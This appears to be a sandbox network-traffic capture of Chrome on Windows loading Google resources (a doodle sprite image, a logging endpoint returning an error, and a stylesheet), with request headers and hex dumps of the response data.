2024-09-26 15:55:28 UTC	1426	OUT	GET /logos/2024/popcorn/rc4/preload-sprite.png HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://www.google.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: image Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO; OGPC=19037049-1:
2024-09-26 15:55:28 UTC	691	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="doodle-eng" Report-To: {"group":"doodle-eng","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/doodle-eng"}]} Content-Length: 27209 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Wed, 25 Sep 2024 19:16:08 GMT Expires: Thu, 25 Sep 2025 19:16:08 GMT Cache-Control: public, max-age=31536000 Last-Modified: Wed, 25 Sep 2024 18:30:00 GMT Content-Type: image/png Age: 74360 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:28 UTC	699	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 c1 00 00 03 c0 08 03 00 00 00 01 eb 0c d3 00 00 02 fd 50 4c 54 45 47 70 4c 85 25 19 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 99 66 11 9c 60 17 9d 60 18 9c 60 19 9c 60 18 9c 60 19 9b 60 19 9b 61 17 9d 62 16 9c 60 18 9e 61 18 4f 2a 0b 37 1b 00 39 1c 00 39 1d 00 39 1c 00 55 2d 10 51 2c 0c 51 2f 0e 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 9c 61 18 9c 60 19 9c 60 18 9b 60 19 9c 63 19 39 1d 00 3a 1e 00 3a 1e 00 3a 1e 00 3a 1e 00 39 1d 00 2b 11 00 1a 04 00 15 01 00 22 09 00 33 19 04 3a 1e 00 3a 1d 00 4b 2b 0c 73 54 31 87 6d 37 a6 8b 46 ba 8f 4a 9a 7a 3d 7f 5a 29 5d 43 1c 3e 22 03 cb ac 5a fa df 79 ff f6 87 ff fc 8b ff e8 81 e9 ce 6d 3a 1d 00 ff ff 90 ff Data Ascii: PNGIHDRPLTEGpL%&&&&&&&&&&&f``````ab`aO*7999U-Q,Q/&&&&a```c9::::9+"3::K+sT1m7FJz=Z)]C>"Zym:
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: d3 7b f2 9b 3e aa 8b 64 ea af 5c ca b4 91 d4 c0 9d ff e3 75 ff f0 cb df cc a8 d6 9e 5f f3 be 62 cc 8c 4a f1 a3 3f ed 91 3c fe e8 bb b6 86 50 da a7 68 ff f0 c4 ae 61 2d ff e9 97 ef 96 3d c6 75 39 0d 09 04 3c 30 16 cb 7e 42 d6 a1 53 fd c9 66 fe dd 72 c1 6d 34 ce 98 4f fb a7 42 df ab 56 c7 75 36 bd 66 31 ab 56 28 a5 50 26 5e 1a bf 94 00 00 00 fc 74 52 4e 53 00 10 40 80 af 70 30 bf 9f 60 20 50 8f 0f 6f 7f af bf ff cf 4f 2f 9f 3f 1e 55 68 9b 8a 5f 3e 0e cf ff df ef 5f ef df 8f 1f 79 c4 f7 ff de ab ff ff ff ff ff e9 ce ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff b9 ff ff ff ff ff ff 4d 2e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: {>d\u_bJ?<Pha-=u9<0~BSfrm4OBVu6f1V(P&^tRNS@p0` PoO/?Uh_>_yM.
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: b3 23 66 40 e2 53 21 55 a7 a9 a1 50 62 3c 12 4e aa 55 68 09 65 50 e4 b8 26 44 96 2e e6 9f a5 35 93 db 86 4a 18 00 c8 ef 81 19 3a be 2c e7 fc 00 97 42 21 d0 48 9c 76 5c ca c1 ef 8b d2 7f 15 a7 44 8d 30 f6 78 7d b8 16 ac bf e7 d1 26 22 09 f3 a1 f1 9b de 16 65 ec fb d4 d4 e4 70 2a 5c 6e 54 c9 30 90 34 72 46 da fd 7a 5f e4 86 90 d6 4c 2f d7 0b f3 1a 01 00 48 0c 30 fb d7 97 95 fc 3a 25 a8 b1 ad 73 3b 5c b4 81 cb e1 46 f7 03 5c b8 d8 d5 e9 f1 65 59 17 e5 ba 62 fc cf 70 0b e1 e7 bf 1b 40 3b 27 0e 2a 37 01 26 f4 43 14 83 82 20 f2 df 53 4a 38 51 31 c4 68 c9 b8 1c e4 5e 10 5a 06 b3 08 09 66 99 9c 42 18 00 80 db 57 9c 5f 8e 2f 2e ab b8 3e bc c2 85 58 27 7a 16 16 2f cd e2 22 2c 6d ed 41 e0 21 03 cc fe 79 d5 3f 8b a3 13 12 a6 24 79 59 5c cd e3 27 ac 56 2e 38 16 56 75 Data Ascii: #f@S!UPb<NUheP&D.5J:,B!Hv\D0x}&"ep\nT04rFz_L/H0:%s;\F\eYbp@;'7&C SJ8Q1h^ZfBW_/.>X'z/",mA!y?$yY\'V.8Vu
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 6d e4 61 bb a4 39 50 15 ec f1 ef 04 3c 43 fe 21 38 36 00 a6 e0 81 50 ce a0 df ef 81 ff d2 11 30 23 2f e0 89 00 2f dc 9a c1 04 0f 69 d8 60 74 b2 44 4e af cc bb d3 ee 00 3a b9 3c 02 f3 94 53 1a fd 2a 0f 91 af a0 a7 dd 77 0d 74 44 69 af 6d 25 e6 ed c9 92 70 7d 4f f9 f3 10 99 93 46 97 aa c5 bc 35 f9 40 ad 43 56 e3 37 52 95 23 d3 bb 16 2f bd 67 4d 64 a4 5d 3d 18 4c 84 8b d7 ec 5c 18 e6 b9 ee c9 30 4c f3 34 85 b1 6d 64 34 6a 30 d3 f6 52 8f c4 f7 1d 47 bd 20 14 1c 05 83 21 a4 c4 13 7b 7d d8 43 a7 9c fc 44 a7 52 68 90 6a 10 42 8b f2 f9 5d 51 ab f1 fb 64 1b 4c 60 d0 3f 45 e8 90 76 0d 46 27 2b 47 fc e3 6c f1 1d 95 4b d2 29 22 1e b5 e5 e5 0b da f0 97 be fa 02 d3 db d6 41 2f 6f d2 a3 30 f2 c4 16 8a 78 a1 3a 4a 12 7d aa 46 e7 b0 0b 69 4c 46 9c 48 a9 fc e3 ca 25 bf 33 Data Ascii: ma9P<C!86P0#//i`tDN:<S*wtDim%p}OF5@CV7R#/gMd]=L\0L4md4j0RG !{}CDRhjB]QdL`?EvF'+GlK)"A/o0x:J}FiLFH%3
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 47 8a ea 62 7c 6f 9a 53 06 2d 44 6b 5b 7f 57 a7 d4 46 aa f7 4c dd ef 6f 6d 9c 36 61 77 13 f3 c8 07 68 30 dc 6c 98 77 5e 87 d9 30 1b 9a b9 30 4c a3 6d 53 44 61 94 da 8e 34 27 83 65 8e 81 62 7e 06 8b 01 c9 60 99 1f 3d 80 cf 60 68 79 70 0d c7 61 e7 3f 96 8a e6 04 20 5e e3 49 9e 8f 72 25 91 92 e1 78 24 1a 0c 12 4c 62 30 73 32 04 30 00 c4 0f 7e 8e b8 ef 0e fa b6 75 f2 48 7f 71 50 ad 04 ed d4 f3 6b 61 ba da bf 73 2a f5 a9 7b 0a 51 4c 0f fd 90 3f fa a3 4b c6 40 53 f9 39 a4 5e 87 8c cf 26 4c 9e ee b5 53 bc 12 4e e4 8c bc 34 12 4d 41 45 2a 1a 91 1e 0a bf 29 71 18 00 84 e9 fa f9 83 77 d5 06 41 3e 64 cc 23 4d db 28 83 f9 08 0d 86 e3 e2 f8 a5 cb b1 a6 a4 b7 19 13 b3 e7 fe 86 e6 a8 c2 34 d9 f6 33 46 72 2c cc ac 8c 79 b3 81 4c e0 2e f6 a5 b9 99 65 a5 bc 94 65 4e 52 4a Data Ascii: Gb\|oS-Dk[WFLom6awh0lw^00LmSDa4'eb~`=`hypa? ^Ir%x$Lb0s20~uHqPkas{QL?K@S9^&LSN4MAE)qwA>d#M(43Fr,yL.eeNRJ
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 67 82 30 bd 79 d6 81 2d df 9a be 09 7d 39 31 c5 77 ea 38 0c 91 27 c0 56 24 25 82 30 fd bd 29 bc 4f 65 29 5f ac 89 8c cd c0 62 f0 a2 64 5e bb 37 4c 73 41 76 29 09 3f c5 0a 75 22 bd 86 b1 22 65 e8 10 36 18 88 c1 5c 97 18 83 41 4e 1d fb de d2 7d d4 16 35 98 26 d6 60 40 60 d2 8c c0 b6 46 c0 03 b6 10 12 b5 d9 d1 8e 7f a6 37 3b a2 0a b9 93 56 d8 a0 94 dc 66 06 a3 2b 4c 36 de b9 c8 e7 ac 37 cf ca fb 45 54 ac 5e a0 1b fd a5 5d 54 26 20 d7 a0 51 be 9e 00 7e 58 99 fa 1b 55 5e 7e 52 c2 24 4f 39 15 57 98 22 45 46 ad bd 22 3e 46 24 7b ea 5d 85 be 1b ed 85 30 cd 0d 85 26 c2 28 96 b7 2b a1 67 4b bf f9 a2 6a 06 03 31 18 4c 23 49 36 98 63 8f 3d 62 32 ef 8b d6 c1 6c 6b 8c 65 91 16 d0 43 e9 66 53 dc 05 03 d1 80 cc b9 ec 01 0b 33 59 ca 4a 81 f2 e8 7b 70 de b9 09 27 fa 03 9f Data Ascii: g0y-}91w8'V$%0)Oe)_bd^7LsAv)?u""e6\AN}5&`@`F7;Vf+L67ET^]T& Q~XU^~R$O9W"EF">F${]0&(+gKj1L#I6c=b2lkeCfS3YJ{p'
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 44 bc 65 8a b3 61 0a 14 5b f9 38 6a 95 a9 85 a9 c2 a4 97 f2 43 3f 88 76 bb 2c 65 f3 87 6c f8 4d 2b 0a 93 2b 14 99 83 7e bf b3 9f bd f5 94 dc 16 35 f1 bb 40 f3 14 31 18 e5 15 a6 4f c2 00 89 15 75 e6 f7 3f bd ce 2a cc d6 b8 28 4c d3 b6 3d dd 82 06 73 ed f8 f1 93 8c b5 fb c9 e6 e8 66 ea 08 b6 df 18 e3 da 84 65 02 65 69 d9 89 93 49 1b 0c da 03 0d e4 96 86 45 1e 8a 25 36 14 6e 6a 4c 2f 40 5a d4 30 cf 01 84 c1 a0 5a d1 06 63 48 07 19 a0 b3 33 60 71 80 60 fd 83 fc 20 4c a1 aa 21 98 de 7e 89 9f b0 d2 a0 31 56 4c 44 69 fb 1f 7b e7 01 dc d4 95 f5 71 63 fa d2 7b c7 b0 c1 36 45 41 4f 52 e0 a3 8a 62 62 0b 03 26 a1 13 b0 48 42 07 9b e0 40 6c 8a 33 64 36 9d b8 d0 3e 87 f6 15 47 1e 65 26 16 43 76 04 86 60 c7 8c 3d 44 72 64 08 29 74 a7 89 65 c9 12 a7 b7 2d d3 f6 4a 3a 2a Data Ascii: Dea[8jC?v,elM++~5@1Ou?(L=sfeeiIE%6njL/@Z0ZcH3`q` L!~1VLDi{qc{6EAORbb&HB@l3d6>Ge&Cv`=Drd)te-J:
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 8d fe ae dd 61 75 29 18 9b 5b c1 cc 1e 2f 53 83 81 10 d2 0e 8d 4e a3 9f 9e 9e 05 63 ec 16 3e a2 d5 a8 f5 63 46 25 00 c3 7d 70 0f 22 89 f6 62 af ca 96 e5 85 e7 9f f3 9d f3 9f 87 46 8f fc 63 5f f3 36 79 f6 c0 43 65 79 d6 17 b9 fe d3 5e 18 dd 22 8b f1 65 5f 94 fb a5 e7 5e 7c 56 46 e8 bc 8a f3 0a fe 72 af ca de 0d 3c 19 75 05 d3 9a 83 82 49 ba 2a 9e b9 ca 77 09 22 b0 1e f4 0b 46 39 b9 e5 6d 0b 3f 05 83 e9 b1 a7 c9 be 76 30 52 bb 44 5f c0 d4 81 80 91 c0 5e 86 f8 ea 9a ff 80 49 a2 17 97 cd 09 f1 77 36 99 0f 12 88 5a e2 2a 4c 0f 62 41 96 43 9e 98 e5 df 46 c2 d7 48 4c 5e eb f4 91 71 5b 0a b0 c6 5c 4f 60 48 5f c9 91 0a c0 56 de ac 8f 30 4f dd a5 77 77 fc d3 d0 9d 08 b0 9e 60 66 4d d2 68 bd 56 db b8 de 9d aa 76 40 0d 46 d0 ff 6d 9f 9c 87 f7 bf 1b d1 18 98 a9 d3 21 Data Ascii: au)[/SNc>cF%}p"bFc_6yCey^"e_^\|VFr<uIw"F9m?v0RD_^Iw6ZLbACFHL^q[\O`H_V0Oww`fMhVv@Fm!
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: c6 85 a8 a9 d4 ab 4b 14 62 48 17 ca 8a 14 48 18 63 19 de 47 fa 84 78 0a 20 f0 1e 7b ab 03 bb f9 60 40 17 d0 2f d8 a1 20 c2 42 bf 2e 90 42 27 87 34 d9 29 c3 77 12 7d 24 b6 b6 ff 54 ac bd 18 75 05 f3 14 e9 3c 98 de fc 04 0c 68 98 b0 cc bc 03 55 05 77 ed ae 1a 4c a6 47 c1 68 84 6b a5 c1 53 60 ae 09 05 6a f0 f0 62 cc 99 af d3 0d 8a 19 05 03 3c 30 1c 1b 09 73 bf 62 7c 72 b8 9f 8e 31 d0 d4 63 b2 f8 06 28 be d3 0c 60 12 86 dd f5 55 2a 2e 60 42 7d a5 9b c9 ae 61 39 6e 15 e8 d2 57 ee c2 bb 81 fc 1b 08 9a d9 bc b8 ea 17 30 65 f6 1b d2 34 d9 4a 4b 8c a0 60 ac 65 40 1d 69 a0 ba 2b 7e 18 10 04 ce 98 b1 85 28 15 36 32 a8 5f 70 80 9f 82 81 d0 37 21 57 bc 3d a4 b5 4e 39 d2 c4 9d a4 77 99 2e 78 c4 66 04 45 5f c1 6c 27 fc b7 b2 b7 c4 ee 94 63 9c 9a 5d a9 8a 14 8c d6 a5 60 Data Ascii: KbHHcGx {`@/ B.B'4)w}$Tu<hUwLGhkS`jb<0sb\|r1c(`U*.`B}a9nW0e4JK`e@i+~(62_p7!W=N9w.xfE_l'c]`
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 7b 9c 4e f7 bc cd d5 46 ca f0 14 61 a6 8f 17 0a 74 85 e7 cf 14 8e 17 b4 ea 5c fd fc f4 0c 69 01 93 61 b3 1f d6 a8 06 c7 96 82 01 da 79 bd 30 71 86 b5 8a 6d 05 43 3e 78 f5 f8 ad 7a 59 05 03 14 37 02 f3 d8 8d b3 3b c9 6a 4a 78 f0 78 5b fa 95 0c 38 6f 61 e4 6d 17 77 0e 1a 22 ed 62 74 e5 37 0c 66 67 19 09 6f 42 aa 96 d8 0c 95 43 3e b8 96 4b df 60 64 98 5b 32 8e 05 c6 4d 2c e6 7c c0 6c 62 57 29 ea 17 69 03 b1 ce 89 31 75 f5 ea 1f 5f 9f ef 94 e4 9b b7 dd 7c 83 6e 16 42 9d 96 a9 59 ee 80 74 9a 8b 17 9b d6 e1 5f 25 44 fd f2 93 64 36 28 f6 47 c5 60 95 80 46 da 21 66 bb 8b 30 59 33 67 a9 34 6a 01 51 a0 d6 e8 26 4c 47 16 5e 83 b4 80 a9 70 14 82 0d 26 86 14 0c d0 ca 97 a9 8e 0b 98 d8 57 30 64 a1 d9 5b f5 f5 7b 9b 81 50 55 98 2b 0c 62 92 78 cf e5 a0 89 99 82 01 92 47 Data Ascii: {NFat\iay0qmC>xzY7;jJxx[8oamw"bt7fgoBC>K`d[2M,\|lbW)i1u_\|nBYt_%Dd6(G`F!f0Y3g4jQ&LG^p&W0d[{PU+bxG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.16	49754	216.58.212.142	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:28 UTC	765	OUT	GET /log?format=json&hasfast=true HTTP/1.1 Host: play.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw== Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=6KcQD-DCOfwRwfuOQLqsCzAUJU8k-iB9YwwFvcmpYUrmT-aHqe4PSNibvvpIkBpozbJIJI-v9_gESduPkkQlck55ADmg5cE9fHUaLwta4beFwdGVUm5zcL1RSzLKJg-VgLu4GE6dK63vW0eMz5cLTFXR7tT0ATtzr7WhodeQZxheX1xtXdL_83w649qhq4-0ZM-Ufd-SBZ6X
2024-09-26 15:55:29 UTC	270	IN	HTTP/1.1 400 Bad Request Date: Thu, 26 Sep 2024 15:55:29 GMT Content-Type: text/html; charset=UTF-8 Server: Playlog Content-Length: 1555 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:29 UTC	1120	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 400 (Bad Request)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-
2024-09-26 15:55:29 UTC	435	IN	Data Raw: 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3e 3c 73 70 61 6e Data Ascii: pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.16	49757	172.217.16.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:29 UTC	1698	OUT	GET /xjs/_/ss/k=xjs.hd.3K9kqFG9IbE.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAAAUADsJAABGAAAbABAAAAAAAAIAgAEAAAAAACABAAAAAmABAAAAAAACABAJAACgCAAAAIBACBAAgAAKIAQoQAIEiiAUAgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACAACAIwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAAAEgAAAMgAEyAAEAAAAAAABkAAAAAAAAAAAAAAAAAAAAAAAAAACAACAAoAAAAAAAAAAAAAAAAAAAAAAC/d=0/br=1/rs=ACT90oEAN8vKHPrZc1uQQW97laV6I-0P2A/m=syjv,syo3?xjs=s4 HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=6KcQD-DCOfwRwfuOQLqsCzAUJU8k-iB9YwwFvcmpYUrmT-aHqe4PSNibvvpIkBpozbJIJI-v9_gESduPkkQlck55ADmg5cE9fHUaLwta4beFwdGVUm5zcL1RSzLKJg-VgLu4GE6dK63vW0eMz5cLTFXR7tT0ATtzr7WhodeQZxheX1xtXdL_83w649qhq4-0ZM-Ufd-SBZ6X
2024-09-26 15:55:29 UTC	809	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Vary: Accept-Encoding, Origin Content-Type: text/css; charset=UTF-8 Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 1689 Date: Thu, 26 Sep 2024 15:55:29 GMT Expires: Fri, 26 Sep 2025 15:55:29 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Thu, 26 Sep 2024 06:30:51 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:29 UTC	581	IN	Data Raw: 2e 4d 54 49 61 4b 62 2c 2e 4c 77 44 55 64 63 2c 2e 46 41 6f 45 6c 65 2c 2e 52 6c 54 43 50 64 2c 2e 77 50 4e 66 6a 62 2c 2e 63 61 4e 76 66 64 2c 2e 56 6e 6f 62 34 62 2c 2e 62 62 78 54 42 62 2c 2e 44 70 67 6d 4b 2c 2e 59 4b 55 68 66 62 2c 2e 75 4e 6e 76 62 2c 2e 61 56 73 5a 70 66 2c 2e 52 6f 4f 56 6d 66 2c 2e 64 49 66 76 51 64 2c 2e 56 33 45 7a 6e 2c 2e 45 6e 62 39 70 65 2c 2e 6d 59 75 6f 61 66 2c 2e 6b 4a 53 42 38 2c 2e 74 55 72 34 4b 63 2c 2e 69 51 4d 74 71 65 7b 2d 2d 59 69 34 4e 62 3a 76 61 72 28 2d 2d 6d 58 5a 6b 71 63 29 3b 2d 2d 70 45 61 30 42 63 3a 76 61 72 28 2d 2d 62 62 51 78 41 62 29 3b 2d 2d 6b 6c 6f 47 33 3a 76 61 72 28 2d 2d 6d 58 5a 6b 71 63 29 3b 2d 2d 59 61 49 65 4d 62 3a 76 61 72 28 2d 2d 58 4b 4d 44 78 63 29 3b 2d 2d 50 61 38 57 6c 62 3a Data Ascii: .MTIaKb,.LwDUdc,.FAoEle,.RlTCPd,.wPNfjb,.caNvfd,.Vnob4b,.bbxTBb,.DpgmK,.YKUhfb,.uNnvb,.aVsZpf,.RoOVmf,.dIfvQd,.V3Ezn,.Enb9pe,.mYuoaf,.kJSB8,.tUr4Kc,.iQMtqe{--Yi4Nb:var(--mXZkqc);--pEa0Bc:var(--bbQxAb);--kloG3:var(--mXZkqc);--YaIeMb:var(--XKMDxc);--Pa8Wlb:
2024-09-26 15:55:29 UTC	443	IN	Data Raw: 6e 66 7b 70 61 64 64 69 6e 67 3a 30 20 31 36 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 2e 59 70 63 44 6e 66 2e 48 47 31 64 76 64 7b 70 61 64 64 69 6e 67 3a 30 7d 2e 48 47 31 64 76 64 3e 2a 7b 70 61 64 64 69 6e 67 3a 30 20 31 36 70 78 7d 2e 57 74 56 35 6e 64 20 2e 59 70 63 44 6e 66 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 38 70 78 7d 2e 5a 74 30 61 35 65 20 2e 59 70 63 44 6e 66 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 38 70 78 7d 2e 47 5a 6e 51 71 65 20 2e 59 70 63 44 6e 66 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 33 70 78 7d 2e 45 70 50 59 4c 64 3a 68 6f 76 65 72 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 45 70 50 59 4c 64 2c 2e 43 42 38 6e 44 65 3a 68 6f 76 65 72 7b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 Data Ascii: nf{padding:0 16px;vertical-align:middle}.YpcDnf.HG1dvd{padding:0}.HG1dvd>*{padding:0 16px}.WtV5nd .YpcDnf{padding-left:28px}.Zt0a5e .YpcDnf{line-height:48px}.GZnQqe .YpcDnf{line-height:23px}.EpPYLd:hover{cursor:pointer}.EpPYLd,.CB8nDe:hover{cursor:default
